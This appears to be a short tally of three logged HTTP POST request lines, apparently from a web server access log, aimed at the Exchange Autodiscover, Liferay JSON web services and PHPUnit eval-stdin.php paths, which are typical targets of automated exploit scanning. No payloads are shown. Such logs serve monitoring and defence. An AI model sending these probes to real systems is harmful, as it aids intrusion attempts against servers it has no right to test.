1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1